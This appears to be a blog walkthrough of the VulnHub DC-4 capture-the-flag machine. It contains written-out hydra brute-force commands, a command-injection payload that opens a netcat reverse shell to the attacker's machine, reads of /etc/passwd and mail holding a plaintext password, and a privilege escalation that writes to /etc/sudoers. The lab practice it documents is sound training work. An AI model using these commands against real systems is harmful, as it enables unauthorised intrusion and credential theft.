xCYY4Rle: VulnHub: DC-4 Walkthrough

First we start off with a NMAP scan of the remote host.

root@ubuntu:~# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-02 10:18 MDT
Nmap scan report for dc-2 (192.168.56.101)
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (EdDSA)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:B3:AB:48 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@ubuntu:~#

NMAP came back with two ports open: 22 and 80 lets fire up nikto and see what it finds on the server.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-02 10:21:32 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7946 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-11-02 10:21:46 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#

Nikto didnt find anything interesting lets run dirb against the remote host and cross our fingers.

root@ubuntu:~/src/nikto/program# dirb http://192.168.56.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov  2 10:23:52 2019
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/css/                                                                                                                                                              
==> DIRECTORY: http://192.168.56.101/images/                                                                                                                                                           
+ http://192.168.56.101/index.php (CODE:200|SIZE:506)                                                                                                                                                  
                                                                                                                                                                                                       
---- Entering directory: http://192.168.56.101/css/ ----
                                                                                                                                                                                                       
---- Entering directory: http://192.168.56.101/images/ ----
                                                                                                                                                                                                       
-----------------
END_TIME: Sat Nov  2 10:23:55 2019
DOWNLOADED: 13836 - FOUND: 1
root@ubuntu:~/src/nikto/program#

Dirb didn't come back with anything interesting either. If we visit to index page we are greeted with an admin login page.

username=admin&password=password

If we sniff the request with burp we get the POST string which it submits to login.php we can use hydra to try and brute force the login to the admin page.

root@ubuntu:~# hydra -l admin -P /home/sam/wordlists/1000-most-common-passwords.txt 192.168.56.101 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 10:53:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1002 login tries (l:1/p:1002), ~63 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.56.101   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 10:53:28
root@ubuntu:~#

We find a successful login and pass combination, lets login and see what we got.

We can see that you are allowed to run commands on the page. if we sniff the request with burp we get the following results.

radio=ls+l&submit=Run

We can insert our own commands in to the radio parameter of the request and get back the source code of the page.

command.php
$my_cmd = $_POST['radio'];
//echo $my_cmd;
$output = shell_exec($my_cmd);
print $output;

If we try and execute a reverse connect shell we get a connect back to our local machine

radio=nc+-e+/bin/sh+192.168.56.1+4444&submit=Run

root@ubuntu:~# nc -l -v -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from dc-4 59178 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)           
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$

We cat the /etc/passwd file and find some users on the system.

www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
www-data@dc-4:/usr/share/nginx/html$

We found 4 users on the system.

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

If we change directory to jim and list the contents of the directory we find some interesting results.

www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls -la
ls -la
total 32
drwxr-xr-x 3 jim  jim  4096 Apr  7  2019 .
drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
www-data@dc-4:/home/jim$

We see two files mbox and test.sh if we cat the contents of test.sh we find.

www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."
www-data@dc-4:/home/jim$

So there is nothing interesting about the test.sh file if we search for SUID able programs we see that it is indeed SUID able.

www-data@dc-4:/home/jim$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
www-data@dc-4:/home/jim$

If we move on to the backups directory we find a file called old-passwords.bak which we will use to brute force ssh. Once we copy over the old-passwords.bak file to our local computer and run hydra against ssh with jim and the username.

root@ubuntu:~/src/nikto/program# hydra -l jim -P /home/sam/old-pass.txt ssh://192.168.56.101
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 11:27:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 11:28:43
root@ubuntu:~/src/nikto/program#

Hydra found a valid user and pass combo now its time to log in to the user jim and see what we can do.

root@ubuntu:~/src/nikto/program# ssh jim@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
jim@192.168.56.101's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

We notice it says we have mail in our inbox. If we strings the mbox file we see that it is an email header.

jim@dc-4:~$ strings mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCiQe-0000gc-EC
 for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: root 
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
jim@dc-4:~$

Lets check /var/mail/jim and read our mail messages.

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls -la
total 12
drwxrwsr-x  2 root mail 4096 Apr  6  2019 .
drwxr-xr-x 12 root root 4096 Apr  5  2019 ..
-rw-rw----  1 jim  mail  715 Apr  6  2019 jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCjIX-0000kO-Qt
 for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: Charles 
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$

We got another password and username which are on the box lets su to charles and see what he can do.

jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)
charles@dc-4:/var/mail$ 

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$

We are able to run the /usr/bin/teehee program which is just the tee program renamed. With that in mind we can add the user charles to the sudoers group and then su.

charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# whoami
root
root@dc-4:/home/charles# cd /root
root@dc-4:~# ls
flag.txt
root@dc-4:~# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:~#

xCYY4Rle

Monday, November 11, 2019

VulnHub: DC-4 Walkthrough

No comments:

Post a Comment

Exploiting Weak WEBDAV Configurations

Search This Blog